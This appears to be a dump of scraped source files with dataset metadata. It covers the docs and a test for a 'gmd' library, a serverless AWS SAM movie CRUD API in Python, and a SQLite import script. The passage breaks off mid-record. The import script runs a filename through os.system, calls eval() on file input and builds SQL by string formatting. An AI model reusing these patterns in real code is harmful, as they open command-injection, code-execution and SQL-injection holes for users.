"alpha_fraction": 0.5581395626068115,
"alphanum_fraction": 0.5581395626068115,
"avg_line_length": 14.527777671813965,
"blob_id": "b1b07865437b28259309ed02167b55348819327e",
"content_id": "ff55d3d14adf59af35c652fe8f77f1e35030afbb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 559,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 36,
"path": "/docs/quick_start.rst",
"repo_name": "andersonvaf/gmd",
"src_encoding": "UTF-8",
"text": "###########################\nInstallation of the package\n###########################\n\nThe package can be installed via `pip` or directly from the\nrepository.\n\nInstall using pip\n-----------------\n\n::\n\n $ pip install gmd\n\n\nInstall from the repository\n===========================\n\n::\n\n $ git clone https://github.com/flopska/gmd\n $ cd gmd\n $ pip install .\n\n\nUsage\n#####\n\nAfter the installation the library can be used like every scikit-learn\ncompatible estimator::\n\n from gmd import GMD\n\n gmd = GMD()\n gmd.fit(data)\n print(gmd.subspaces_)\n"
},
{
"alpha_fraction": 0.4654534161090851,
"alphanum_fraction": 0.5256015062332153,
"avg_line_length": 32.77083206176758,
"blob_id": "5b675b2397a9aa3ba0bd8e5503909e7e4b5100f8",
"content_id": "825c90d167ca0e521891b8b2597804db2b231e57",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3242,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 96,
"path": "/tests/test_incr_gmd.py",
"repo_name": "andersonvaf/gmd",
"src_encoding": "UTF-8",
"text": "import unittest\nimport numpy as np\nimport pandas as pd\n\nfrom .context import *\nfrom .context import libgmdc\n\n\nclass TestIncGMD(unittest.TestCase):\n \"\"\"\n Test the incremental GMD implementation\n \"\"\"\n\n def gen_data(self, length):\n return pd.DataFrame(\n {\n \"x1\": np.random.uniform(0, 1, length),\n \"x2\": np.random.uniform(0, 1, length),\n \"x3\": np.random.uniform(0, 1, length),\n \"x4\": np.random.uniform(0, 1, length),\n \"x5\": np.random.uniform(0, 1, length),\n \"x6\": np.random.uniform(0, 1, length),\n \"x7\": np.random.uniform(0, 1, length),\n \"x8\": np.random.uniform(0, 1, length),\n \"x9\": np.random.uniform(0, 1, length),\n \"x10\": np.random.uniform(0, 1, length),\n }\n )\n\n def setUp(self):\n unsorted = np.array([[0.1, 1.4, 2.7], [1.2, 1.5, 0.8], [2.3, 3.6, 1.9]])\n\n self.sorted_index = IncSortedIndex(unsorted)\n\n def test_can_create_sorted(self):\n self.assertListEqual(\n self.sorted_index.sorted.tolist(), [[0, 0, 1], [1, 1, 2], [2, 2, 0]]\n )\n\n def test_delete_two_oldest(self):\n e1 = np.array([4.8, 0.2, 1.2])\n e2 = np.array([1.5, 2.4, 0.3])\n self.sorted_index.del_and_ins_sorted(e1)\n self.sorted_index.del_and_ins_sorted(e2)\n self.assertListEqual(\n self.sorted_index.sorted.tolist(), [[2, 1, 2], [0, 2, 1], [1, 0, 0]]\n )\n\n def test_delete_and_insert(self):\n e1 = np.array([4.8, 0.2, 1.2])\n self.sorted_index.del_and_ins_sorted(e1)\n self.assertListEqual(\n self.sorted_index.sorted.tolist(), [[0, 2, 0], [1, 0, 2], [2, 1, 1]]\n )\n\n def test_delete_and_insert_multiple_times(self):\n e1 = np.array([4.8, 0.2, 1.2])\n e2 = np.array([1.5, 2.4, 0.3])\n self.sorted_index.del_and_ins_sorted(e1)\n self.sorted_index.del_and_ins_sorted(e2)\n self.assertListEqual(\n self.sorted_index.sorted.tolist(), [[2, 1, 2], [0, 2, 1], [1, 0, 0]]\n )\n\n def test_inc_insert_is_equal_to_regular_sorting(self):\n df = self.gen_data(1000)\n window_size = 50\n start_window = df[:window_size]\n\n sorted_index = IncSortedIndex(start_window)\n for i in range(window_size, len(df)):\n sorted_index.del_and_ins_sorted(df.iloc[i])\n\n # the sorted_index should now equal the data structure we obtain by just\n # sorting the last 100 elements\n\n reference = GMD().create_sorted_index(df[-window_size:])\n self.assertListEqual(sorted_index.sorted.tolist(), reference.tolist())\n\n def test_initial_sorting_works_with_ties(self):\n data = np.array(\n [\n [0.0, 0.64, 0.64, 0.0, 0.32],\n [0.21, 0.28, 0.5, 0.0, 0.14],\n [0.06, 0.0, 0.71, 0.0, 1.23],\n [0.0, 0.0, 0.0, 0.0, 0.63],\n [0.0, 0.0, 0.0, 0.0, 0.63],\n ]\n )\n expected = GMD().create_sorted_index(data)\n actual = IncSortedIndex(data).sorted\n self.assertListEqual(actual.tolist(), expected.tolist())\n\n\nif __name__ == \"__main__\":\n unittest.main()\n"
}
] | 17 |
delta575/yapp-backend-dev
|
https://github.com/delta575/yapp-backend-dev
|
906e5f24df806409540a4b4b091e02c051cd25ef
|
d5450c9a1c2f882c489682d3ce38f945b0460b26
|
ed4143f78e07a76e84545cb032e77f93a2a52913
|
refs/heads/master
| 2022-11-10T06:00:20.304553 | 2020-06-24T07:29:45 | 2020-06-24T07:29:45 | 274,256,708 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.523379385471344,
"alphanum_fraction": 0.5515409111976624,
"avg_line_length": 27.953845977783203,
"blob_id": "277b686053a12b45b33c8473f5559c3e64a146bb",
"content_id": "9e1cff628fa9e7aafe45b764ab9e28491aecd44e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1882,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 65,
"path": "/yapp_backend/models.py",
"repo_name": "delta575/yapp-backend-dev",
"src_encoding": "UTF-8",
"text": "from sqlalchemy import Column, Integer, String\nfrom sqlalchemy_serializer import SerializerMixin\n\nfrom db import Base\n\n\nclass Movie(Base, SerializerMixin):\n \"\"\"Movie model for mysqlachemy\n Valid JSON data example:\n {\n \"title\": \"Elizabeth\",\n \"genres\": \"Biography,Drama,History\",\n \"age\": \"18+\",\n \"country\": \"United Kingdom\",\n \"directors\": \"Shekhar Kapur\",\n \"disney_plus\": \"0\",\n \"movie_type\": \"0\",\n \"year\": \"1998\",\n \"hulu\": \"0\",\n \"language\": \"English,French\",\n \"rotten_tomatoes\": \"82%\",\n \"imbd\": \"7.4\",\n \"netflix\": \"1\",\n \"prime_video\": \"0\",\n \"runtime\": \"124\"\n }\n \"\"\"\n\n __tablename__ = \"movies\"\n id = Column(\"ID\", Integer, primary_key=True)\n title = Column(\"Title\", String(length=300))\n year = Column(\"Year\", String(length=50))\n age = Column(\"Age\", String(length=10))\n imbd = Column(\"IMDb\", String(length=10))\n rotten_tomatoes = Column(\"Rotten Tomatoes\", String(length=10))\n netflix = Column(\"Netflix\", String(length=10))\n hulu = Column(\"Hulu\", String(length=10))\n prime_video = Column(\"Prime Video\", String(length=10))\n disney_plus = Column(\"Disney+\", String(length=10))\n movie_type = Column(\"Type\", String(length=10))\n directors = Column(\"Directors\", String(length=500))\n genres = Column(\"Genres\", String(length=300))\n country = Column(\"Country\", String(length=300))\n language = Column(\"Language\", String(length=300))\n runtime = Column(\"Runtime\", String(length=10))\n\n _csv_columns = [\n \"index\",\n \"id\",\n \"title\",\n \"year\",\n \"age\",\n \"imbd\",\n \"rotten_tomatoes\",\n \"netflix\",\n \"hulu\",\n \"prime_video\",\n \"disney_plus\",\n \"movie_type\",\n \"directors\",\n \"genres\",\n \"country\",\n \"language\",\n \"runtime\",\n ]\n"
},
{
"alpha_fraction": 0.8131868243217468,
"alphanum_fraction": 0.8571428656578064,
"avg_line_length": 45,
"blob_id": "1efdef764fc2bfb5cd600b00303d4a2933e144c4",
"content_id": "3bc927ae9b4a8da030eab2cadbb3f7104a76ae6e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 91,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 2,
"path": "/.env.example",
"repo_name": "delta575/yapp-backend-dev",
"src_encoding": "UTF-8",
"text": "PYTHONPATH=yapp_backend\nDATABASE_URL=mysql+mysqlconnector://docker:pass@localhost:3306/yapp"
},
{
"alpha_fraction": 0.641566812992096,
"alphanum_fraction": 0.6446092128753662,
"avg_line_length": 44.73043441772461,
"blob_id": "27528ab43f5b451c6727c210bf16e4f98b0ae4bf",
"content_id": "da21c17217703240eb11fad10330b2cd57406281",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5259,
"license_type": "no_license",
"max_line_length": 212,
"num_lines": 115,
"path": "/README.md",
"repo_name": "delta575/yapp-backend-dev",
"src_encoding": "UTF-8",
"text": "# yapp-backend-dev\n\n> Yapp Backend Developer code challenge\n\nThis project demonstrates a simple implementation of a Serverless API that implements simple CRUD methods for a MySQL DataBase. It makes use of AWS SAM CLI deploying serverless functions as API endpoint handlers.\n\n## Description\n\nThis project contains source code and supporting files for a serverless application that you can deploy with the SAM CLI. It includes the following files and folders.\n\n- .env.example - A template that defines the project needed environment variables.\n- template.yaml - A template that defines the application's AWS resources.\n- docker-compose.yml - A containerized MySQL DataBase to help with fast deployment.\n- yapp_backend/ - Code for the application's Lambda function.\n - tests/ - Unit tests for the application code.\n - app.py - Serverless API handlers.\n - db.py - Database connection and session setup.\n - models.py - Movie SQLAlchemy model.\n - data.csv - Kaggle data for movies and ratings.\n - seed.py - Script to populate blank DataBase.\n\n## Requirements\n\nThis project assumes the following requirements are met.\n\n- [Python3.7+ ](https://www.python.org/downloads/) - Lambda functions use Python runtime environment.\n- [Docker and docker-compose](https://docs.docker.com/engine/install/) - Needed for AWS SAM CLI and MySQL DataBase.\n- [AWS SAM CLI](https://docs.aws.amazon.com/serverless-application-model/latest/developerguide/serverless-sam-cli-install.html) - AWS Serverless Application Model framework.\n\n## Deployment\n\n- ### Clone this repo\n\n```bash\n$ git clone https://github.com/delta575/yapp-backend-dev.git # Clone this repo\n$ cd yapp-backend-dev # Change directory to project root folder\n```\n\n- ### Set environment variables\n\nEdit file following this specifications:\n\n```bash\n$ cp .env.example .env # Copy example\n$ nano .env # Edit file\n```\n\n| Variable | Description |\n| ------------ | --------------------------------------------------------------------------------------------------------------------------------- |\n| PYTHONPATH | Changes python root path for SAM compatibility, must be changed to point at \"yapp_backend\" folder |\n| DATABASE_URL | MySQL URL for connection, must follow the following structure: \"mysql+mysqlconnector://{user}:{password}@{host}:{port}/{db_name}\" |\n\n**Important:** Set the same DATABASE_URL environment variable for SAM Global configs located on `template.yaml` file.\n\n- ### Setup virtual environment and install requirements:\n\nInstall development requirements, poetry is used as the preferred package manager.\nFollow the [install instructions](https://python-poetry.org/docs/#installation) for your enviroment.\n\nThen install the project local dependencies:\n\n```bash\n$ poetry install # Create virtual env and install dependencies\n```\n\n- ### Deploy MySQL DataBase\n\nIf you already have MySQL deployed you can skip this step, just make sure to point the DATABASE_URL env var correctly.\n\nFor easy deployment, a MySQL DataBase was containerized with a `docker-compose.yml` which also sets the needed environment variables for authentication.\n\n```bash\n$ docker-compose up --build -d # Deploys MySQL database as a docker container\n```\n\n- ### Seed Data\n\nRun the script `seed.py` which will create the Movie table from it's model and populate the DataBase with `data.csv` content.\ndata.csv follows [this Kaggle repository](https://www.kaggle.com/ruchi798/movies-on-netflix-prime-video-hulu-and-disney/data#) structure.\n\n```bash\n$ poetry shell # activate virtual environment\n$ python yapp_backend/seed.py # run seed script\n```\n\n- ### Run Unit Tests\n\nTests are defined in the `tests` folder in this project. Use [pytest](https://docs.pytest.org/en/latest/) to run unit tests.\n\n```bash\npoetry shell # activate virtual environment\npython -m pytest -v # run unit tests\n```\n\n- ### Deploy SAM Local Server\n\n```bash\nsam build --use-container && sam local start-api\n```\n\nYou can test the API visiting a GET method on your browser, by default SAM runs at [http://localhost:3000/](http://localhost:3000/).\n\n[Postman](https://www.postman.com/) is recommended for fully featured testing.\n\n## SAM API:\n\nSimple CRUD methods:\n\n| Method | Endpoint | Description | Requires |\n| ------ | ----------- | ------------------------------------------------------------------ | -------------------------------------- |\n| GET | /movie | Returns Array of Movies | None |\n| GET | /movie/{id} | Returns movie matching id | URL Params: movie id |\n| POST | /movie | Creates new movie from JSON data on body of request | Body: JSON with new movie data |\n| PUT | /movie | Updates movie title by id provided in JSON data on body of request | Body: JSON with movie id and new title |\n| DELETE | /movie | Removes Movie matching id of QueryString from DataBase | QueryString: URL encoded movie id |\n"
},
{
"alpha_fraction": 0.8985507488250732,
"alphanum_fraction": 0.8985507488250732,
"avg_line_length": 16.5,
"blob_id": "35b9fc82a2206fbc28c90766a99dfaf4ca002466",
"content_id": "a34d600308ef65835172a57be735cc3995b59018",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 69,
"license_type": "no_license",
"max_line_length": 22,
"num_lines": 4,
"path": "/yapp_backend/requirements.txt",
"repo_name": "delta575/yapp-backend-dev",
"src_encoding": "UTF-8",
"text": "python-dotenv\nmysql-connector-python\nsqlalchemy\nsqlalchemy-serializer"
},
{
"alpha_fraction": 0.5871559381484985,
"alphanum_fraction": 0.6660550236701965,
"avg_line_length": 22.69565200805664,
"blob_id": "8e2576a49f2f4c53373e295a1a4ce255b59e4e6f",
"content_id": "d18c19409e21b7bd3563876a6e9ab6b17123c604",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TOML",
"length_bytes": 545,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 23,
"path": "/pyproject.toml",
"repo_name": "delta575/yapp-backend-dev",
"src_encoding": "UTF-8",
"text": "[tool.poetry]\nname = \"yapp-backend-dev\"\nversion = \"0.1.0\"\ndescription = \"Yapp BackEnd Developer Challenge\"\nauthors = [\"Felipe Aranguiz\"]\n\n[tool.poetry.dependencies]\npython = \"^3.7\"\nsqlalchemy = \"^1.3.17\"\nmysql-connector-python = \"^8.0.20\"\nSQLAlchemy-serializer = \"^1.3.4\"\npython-dotenv = \"^0.13.0\"\n\n[tool.poetry.dev-dependencies]\nblack = {version = \"^19.10b0\", allow-prereleases = true}\nflake8 = \"^3.8.3\"\nflake8-bugbear = \"^20.1.4\"\npytest = \"^5.4.3\"\npytest-mock = \"^3.1.1\"\n\n[build-system]\nrequires = [\"poetry>=0.12\"]\nbuild-backend = \"poetry.masonry.api\"\n"
},
{
"alpha_fraction": 0.6305525302886963,
"alphanum_fraction": 0.6338028311729431,
"avg_line_length": 26.969696044921875,
"blob_id": "18225023a4a4ba1fa893321cebd7966d698bfbbb",
"content_id": "2e5c6f8c2e552fa9831ba5d85dcfc6ab56cb185c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 923,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 33,
"path": "/yapp_backend/seed.py",
"repo_name": "delta575/yapp-backend-dev",
"src_encoding": "UTF-8",
"text": "import csv\n\nfrom db import Base, Session, engine\nfrom models import Movie\n\n\ndef seed_data(file_path):\n \"\"\"Populates MySQL DataBase with data from csv file\n Format should follow this Kaggle example:\n https://www.kaggle.com/ruchi798/movies-on-netflix-prime-video-hulu-and-disney/data#\n \"\"\"\n # Create Schema\n Base.metadata.create_all(engine)\n\n # Create SQL Session\n session = Session()\n\n # Read csv file and add data to session\n with open(file_path, newline=\"\") as csvfile:\n reader = csv.reader(csvfile, delimiter=\",\")\n next(reader, None) # skip headers\n columns = Movie()._csv_columns\n for row in reader:\n movie_data = {key: val for key, val in zip(columns, row)}\n movie_data.pop(\"index\")\n session.add(Movie(**movie_data))\n\n session.commit()\n session.close()\n\n\nif __name__ == \"__main__\":\n seed_data(\"yapp_backend/data.csv\")\n"
},
{
"alpha_fraction": 0.5254237055778503,
"alphanum_fraction": 0.5540391802787781,
"avg_line_length": 29.695945739746094,
"blob_id": "458174e4fc589e880c6d61ed4bcdb251796618ee",
"content_id": "c42c814938f07cd42d459df8fbb382d82eb78024",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4543,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 148,
"path": "/yapp_backend/tests/unit/test_handler.py",
"repo_name": "delta575/yapp-backend-dev",
"src_encoding": "UTF-8",
"text": "import json\n\nimport pytest\n\nfrom yapp_backend import app as api\n\n\[email protected]()\ndef apigw_event():\n \"\"\" Generates API GW Event\"\"\"\n\n return {\n \"body\": '{ \"test\": \"body\"}',\n \"resource\": \"/{proxy+}\",\n \"requestContext\": {\n \"resourceId\": \"123456\",\n \"apiId\": \"1234567890\",\n \"resourcePath\": \"/{proxy+}\",\n \"httpMethod\": \"POST\",\n \"requestId\": \"c6af9ac6-7b61-11e6-9a41-93e8deadbeef\",\n \"accountId\": \"123456789012\",\n \"identity\": {\n \"apiKey\": \"\",\n \"userArn\": \"\",\n \"cognitoAuthenticationType\": \"\",\n \"caller\": \"\",\n \"userAgent\": \"Custom User Agent String\",\n \"user\": \"\",\n \"cognitoIdentityPoolId\": \"\",\n \"cognitoIdentityId\": \"\",\n \"cognitoAuthenticationProvider\": \"\",\n \"sourceIp\": \"127.0.0.1\",\n \"accountId\": \"\",\n },\n \"stage\": \"prod\",\n },\n \"queryStringParameters\": {\"foo\": \"bar\"},\n \"headers\": {\n \"Via\": \"1.1 08f323deadbeefa7af34d5feb414ce27.cloudfront.net (CloudFront)\",\n \"Accept-Language\": \"en-US,en;q=0.8\",\n \"CloudFront-Is-Desktop-Viewer\": \"true\",\n \"CloudFront-Is-SmartTV-Viewer\": \"false\",\n \"CloudFront-Is-Mobile-Viewer\": \"false\",\n \"X-Forwarded-For\": \"127.0.0.1, 127.0.0.2\",\n \"CloudFront-Viewer-Country\": \"US\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\n \"Upgrade-Insecure-Requests\": \"1\",\n \"X-Forwarded-Port\": \"443\",\n \"Host\": \"1234567890.execute-api.us-east-1.amazonaws.com\",\n \"X-Forwarded-Proto\": \"https\",\n \"X-Amz-Cf-Id\": \"aaaaaaaaaae3VYQb9jd-nvCd-de396Uhbp027Y2JvkCPNLmGJHqlaA==\",\n \"CloudFront-Is-Tablet-Viewer\": \"false\",\n \"Cache-Control\": \"max-age=0\",\n \"User-Agent\": \"Custom User Agent String\",\n \"CloudFront-Forwarded-Proto\": \"https\",\n \"Accept-Encoding\": \"gzip, deflate, sdch\",\n },\n \"pathParameters\": {\"proxy\": \"/examplepath\"},\n \"httpMethod\": \"POST\",\n \"stageVariables\": {\"baz\": \"qux\"},\n \"path\": \"/examplepath\",\n }\n\n\ndef test_movie_list_handler(apigw_event, mocker):\n event_mods = dict(\n body=dict(),\n pathParameters=dict(),\n queryStringParameters=dict(),\n httpMethod=\"GET\",\n )\n apigw_event.update(event_mods)\n\n ret = api.movie_list_handler(apigw_event, \"\")\n body = json.loads(ret[\"body\"])\n\n assert ret[\"statusCode\"] == 200\n assert \"data\" in body\n assert len(body[\"data\"]) > 0\n assert \"id\" in body[\"data\"][0]\n\n\ndef test_movie_get_handler(apigw_event, mocker):\n event_mods = dict(\n body=dict(),\n pathParameters=dict(id=158),\n queryStringParameters=dict(),\n httpMethod=\"GET\",\n )\n apigw_event.update(event_mods)\n\n ret = api.movie_get_handler(apigw_event, \"\")\n body = json.loads(ret[\"body\"])\n\n assert ret[\"statusCode\"] == 200\n assert \"data\" in body\n assert \"id\" in body[\"data\"]\n\n\ndef test_movie_create_handler(apigw_event, mocker):\n event_mods = dict(\n body=json.dumps(dict(title=\"Create Movie Test Ok\")),\n pathParameters=dict(),\n queryStringParameters=dict(),\n httpMethod=\"POST\",\n )\n apigw_event.update(event_mods)\n\n ret = api.movie_create_handler(apigw_event, \"\")\n body = json.loads(ret[\"body\"])\n\n assert ret[\"statusCode\"] == 200\n assert \"data\" in body\n assert \"id\" in body[\"data\"]\n assert body[\"data\"][\"title\"] == \"Create Movie Test Ok\"\n\n\ndef test_movie_update_handler(apigw_event, mocker):\n event_mods = dict(\n body=json.dumps(dict(id=3, title=\"PUT Test Ok\")),\n pathParameters=dict(),\n queryStringParameters=dict(),\n httpMethod=\"PUT\",\n )\n apigw_event.update(event_mods)\n\n ret = api.movie_update_handler(apigw_event, \"\")\n body = json.loads(ret[\"body\"])\n\n assert ret[\"statusCode\"] == 200\n assert \"data\" in body\n assert \"id\" in body[\"data\"]\n assert body[\"data\"][\"title\"] == \"PUT Test Ok\"\n\n\ndef test_movie_delete_handler(apigw_event, mocker):\n event_mods = dict(\n body=dict(),\n pathParameters=dict(),\n queryStringParameters=dict(id=5),\n httpMethod=\"DELETE\",\n )\n apigw_event.update(event_mods)\n\n ret = api.movie_delete_handler(apigw_event, \"\")\n\n assert ret[\"statusCode\"] == 200\n assert \"body\" not in ret\n"
},
{
"alpha_fraction": 0.6302585601806641,
"alphanum_fraction": 0.6341180801391602,
"avg_line_length": 21.53043556213379,
"blob_id": "da74d6dc14dd597be990d92c691adc8ddfdb6e8e",
"content_id": "d96d1edd520dd38b191c8a42af199143cbbee60b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2591,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 115,
"path": "/yapp_backend/app.py",
"repo_name": "delta575/yapp-backend-dev",
"src_encoding": "UTF-8",
"text": "import functools\nimport json\nimport logging\n\nfrom db import Session\nfrom models import Movie\n\nlog = logging.getLogger(__name__)\n\n\ndef handler_decorator(handler):\n \"\"\"Response Handler decorator\n Catches errors and handle sessions\n \"\"\"\n\n @functools.wraps(handler)\n def handler_wrapper(event, context):\n try:\n session = Session()\n data = handler(event, context, session)\n\n response = {\"statusCode\": 200}\n\n if data:\n response[\"body\"] = json.dumps({\"data\": data})\n\n return response\n\n except Exception as e:\n return {\"statusCode\": 500, \"body\": json.dumps({\"error\": e.args})}\n\n finally:\n session.close()\n\n return handler_wrapper\n\n\n@handler_decorator\ndef movie_list_handler(event, context, session):\n \"\"\"GET /movie/list Handler\n Returns:\n JSON with list of all movies\n \"\"\"\n movies = session.query(Movie).order_by(Movie.title).all()\n return [movie.to_dict() for movie in movies]\n\n\n@handler_decorator\ndef movie_get_handler(event, context, session):\n \"\"\"GET /movie/{id} Handler\n Returns:\n JSON with movie matching URL id parameter\n \"\"\"\n movie_id = event[\"pathParameters\"][\"id\"]\n\n movie = session.query(Movie).get(movie_id)\n\n return movie.to_dict() if movie else None\n\n\n@handler_decorator\ndef movie_create_handler(event, context, session):\n \"\"\"POST /movie Handler\n Request Body:\n JSON following Movie model\n Returns:\n JSON with new movie added to DB\n \"\"\"\n payload = json.loads(event[\"body\"])\n\n new_movie = Movie(**payload)\n\n session.add(new_movie)\n session.commit()\n\n return new_movie.to_dict()\n\n\n@handler_decorator\ndef movie_update_handler(event, context, session):\n \"\"\"PUT /movie Handler\n Request Body:\n JSON following containing Movie id and new title. example:\n {\n \"id\": 3,\n \"title\": \"Star Wars\"\n }\n Returns:\n JSON with modified movie data\n \"\"\"\n payload = json.loads(event[\"body\"])\n movie_id = payload.pop(\"id\")\n\n movie = session.query(Movie).get(movie_id)\n movie.title = payload[\"title\"]\n session.commit()\n\n return movie.to_dict()\n\n\n@handler_decorator\ndef movie_delete_handler(event, context, session):\n \"\"\"DELETE /movie?id={id} Handler\n URL Params:\n Query String containing Movie id to delete, example:\n ?id=153\n Returns:\n Status code of resulting operation\n \"\"\"\n movie_id = event[\"queryStringParameters\"][\"id\"]\n\n session.query(Movie).filter(Movie.id == movie_id).delete()\n session.commit()\n\n return None\n"
},
{
"alpha_fraction": 0.5628930926322937,
"alphanum_fraction": 0.5943396091461182,
"avg_line_length": 16.66666603088379,
"blob_id": "343390928cdede125098aba81ef238e5c58f6b17",
"content_id": "51758f738b5a387b840580333b1c6423f0094e55",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "YAML",
"length_bytes": 318,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 18,
"path": "/docker-compose.yml",
"repo_name": "delta575/yapp-backend-dev",
"src_encoding": "UTF-8",
"text": "version: \"3\"\n\nservices:\n database:\n image: mysql:8\n container_name: db\n ports:\n - \"3306:3306\"\n volumes:\n - db-data:/var/lib/mysql\n environment:\n - MYSQL_DATABASE=yapp\n - MYSQL_ROOT_PASSWORD=root\n - MYSQL_USER=docker\n - MYSQL_PASSWORD=pass\n\nvolumes:\n db-data:\n"
},
{
"alpha_fraction": 0.7921478152275085,
"alphanum_fraction": 0.7921478152275085,
"avg_line_length": 21.789474487304688,
"blob_id": "5196ed00a521acd9408c8c2778be20b50a4cf269",
"content_id": "eda2a3901ad2591a21342266e959c3df7a8900f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 433,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 19,
"path": "/yapp_backend/db.py",
"repo_name": "delta575/yapp-backend-dev",
"src_encoding": "UTF-8",
"text": "import os\nfrom dotenv import load_dotenv\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\n\n# Get DATABASE_URL from .env file\nload_dotenv()\ndatabase_url = os.getenv(\"DATABASE_URL\")\n\n# Create engine\nengine = create_engine(database_url)\n\n# Create Session Maker\nSession = sessionmaker(bind=engine)\n\n# Create Base schema Class\nBase = declarative_base()\n"
}
] | 10 |
Drahow/python_sqlite
|
https://github.com/Drahow/python_sqlite
|
f43efe977eae2612ce8374136569889b2b3fa327
|
2d96b74a59c0ef1ddd518788770dd3ebb988cdee
|
e57aa466baea6b13434f9b055fe800a078b39e40
|
refs/heads/master
| 2020-03-10T07:24:34.554504 | 2018-04-21T14:49:45 | 2018-04-21T14:49:45 | 129,262,151 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4735877811908722,
"alphanum_fraction": 0.4824427366256714,
"avg_line_length": 28.673076629638672,
"blob_id": "f6f842f1e1b8a2bbda6ba3a8bfb081a2ca5acdf7",
"content_id": "0e9d9d5cc1462c15d41d45f8f37e8da59d2bec52",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3443,
"license_type": "no_license",
"max_line_length": 330,
"num_lines": 104,
"path": "/Python_Sqlite/parser_shutter.py",
"repo_name": "Drahow/python_sqlite",
"src_encoding": "UTF-8",
"text": "import re\r\nimport sqlite3\r\nimport os\r\n\r\nclass insertsql(object):\r\n\r\n def __init__(self,database_name):\r\n##对数据库操作之前,先备份\r\n os.system('mkdir sql.bk')\r\n os.system('cp %s sql.bk'%database_name)\r\n conn = sqlite3.connect(database_name)\r\n cursor = conn.cursor()\r\n ##先删除数据库中之前的数据\r\n cursor.execute('delete from shutter where pos >= 0')\r\n cursor.close()\r\n conn.commit()\r\n conn.close\r\n \r\n shutter_list = []\r\n\r\n##逐行读取txt文本中的内容,并保存在shutter_list表格中 \r\n def readtxt(self,name):\r\n shutter_list = []\r\n f = open(name , 'r')\r\n lines = f.readlines()\r\n for line in lines:\r\n if line != '\\n':\r\n line = line.strip('\\n')\r\n shutter_list.append(line)\r\n print(shutter_list)\r\n return shutter_list\r\n\r\n \r\n##获取元素attr的值,并返回\r\n def get_value(self,attr,attr_list,shutter_list):\r\n i = 0\r\n n = 0\r\n length = len(attr_list)\r\n \r\n while(1):\r\n if attr == attr_list[i]:\r\n n = i\r\n break\r\n else:\r\n i +=1\r\n if n < (length -1):\r\n Number1 = length - n - 2\r\n Number2 = 1\r\n else:\r\n Number1 = 0\r\n Number2 = 0\r\n if n < 9:\r\n restr = r'%s%s=(.*?),%s%s;'%(n*'.*?,',attr,Number1*'.*?,',Number2*'.*?')\r\n else:\r\n restr = r'pos=.*?,%s%s=(.*?)%s%s;'%((n-1)*'.*?,',attr,Number1*'.*?,',Number2*'.*?')\r\n \r\n cond = re.compile(restr,re.IGNORECASE)\r\n values = []\r\n for shutter_info in shutter_list:\r\n value = cond.findall(shutter_info)[0]\r\n values.append(eval(value))\r\n \r\n return values\r\n \r\n\r\n##将值与元素对应,并返回一个字典\r\n def parse_list(self,attr_list,value_list):\r\n\r\n count = 0\r\n value_dict = {}\r\n length = len(value_list)\r\n while count < length:\r\n value_dict[attr_list[count]] = value_list[count]\r\n count += 1\r\n return value_dict\r\n \r\n##将读取到的值更新到数据库\r\n def insertsql(self,n,value_dict,database_name):\r\n conn = sqlite3.connect(database_name)\r\n cursor = conn.cursor()\r\n\r\n ##插入数据库\r\n \r\n cursor.execute('insert into shutter (pos,maxnum,num,id,lock,sort,x,y,z,A) values (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)'%(value_dict['pos'][n],value_dict['maxnum'][n],value_dict['num'][n],value_dict['id'][n],value_dict['lock'][n],value_dict['sort'][n],value_dict['x'][n],value_dict['y'][n],value_dict['z'][n],value_dict['A'][n]))\r\n cursor.close()\r\n conn.commit()\r\n conn.close\r\n \r\n \r\n\r\nif __name__=='__main__':\r\n insert = insertsql('shutter.sqlite')\r\n attr_list = ['pos','maxnum','num','id','lock','sort','x','y','z','A']\r\n shutter_list = insert.readtxt('shutter.txt')\r\n value_list = []\r\n for i in attr_list:\r\n values = insert.get_value(i,attr_list,shutter_list)\r\n value_list.append(values)\r\n value_dict = insert.parse_list(attr_list,value_list)\r\n length = len(value_list[0])\r\n n = 0\r\n while n < length:\r\n insert.insertsql(n,value_dict,'shutter.sqlite')\r\n n += 1\r\n\r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n"
},
{
"alpha_fraction": 0.599439799785614,
"alphanum_fraction": 0.6302521228790283,
"avg_line_length": 18.75,
"blob_id": "ed5d3c311ae684b85e0d7672d4f065df17ff5e3d",
"content_id": "f2bd0cd1e908d7b813ffb13a7c4f326e7f56906b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 794,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 36,
